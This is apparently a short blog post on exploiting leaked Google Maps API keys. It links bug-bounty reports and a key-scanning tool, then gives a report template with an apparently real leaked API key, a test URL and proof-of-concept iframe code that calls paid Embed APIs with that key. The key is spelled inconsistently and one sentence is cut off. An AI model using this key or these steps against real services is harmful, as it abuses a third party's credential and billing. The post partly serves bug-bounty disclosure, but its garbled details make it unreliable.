How to Exploit Google API key

Google API Key Exploit

https://hackerone.com/reports/1066410

https://hackerone.com/reports/1065041


Exploit POC

https://www.youtube.com/watch?v=IEnYOsefbks


Tools to make Exploit POC

https://github.com/ozguralp/gmapsapiscanner


 Hii team I have found your google map API key leaking in source code of one of your subdomain.

 Let's see how to find and use it.

 Vulnerable URL: https://example.com/virtual

 api key: AIzaSyBiyf0K2SL3k9iXh7cKB4mB7e03g4jd39k


 Check whether api is working or not


https://www.google.com/maps/embed/v1/place?key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7eo3g4jd39k&q=Seattle&language=en

 It is working

 Let's try to use in i


 API key is vulnerable for Embed (Basic-Free) API. Here is the POC HTML code:

 <iframe width="600" height="450" frameborder="0" style="border:0" src="https://www.google.com/maps/embed/v1/place?q=Seattle&key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7e03g4jd39k" allowfullscreen></iframe>


 API key is vulnerable for Embed (Advanced-Paid) API. Here is the POC HTML code:

<iframe width="600" height="450" frameborder="0" style="border:0" src="https://www.google.com/maps/embed/v1/search? q=record+stores+in+Seattle&key=AIzaSyBiyf0K2SL3k9iXh7cKB4mB7eo3g4jd39k" allowfullscreen></iframe>


Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.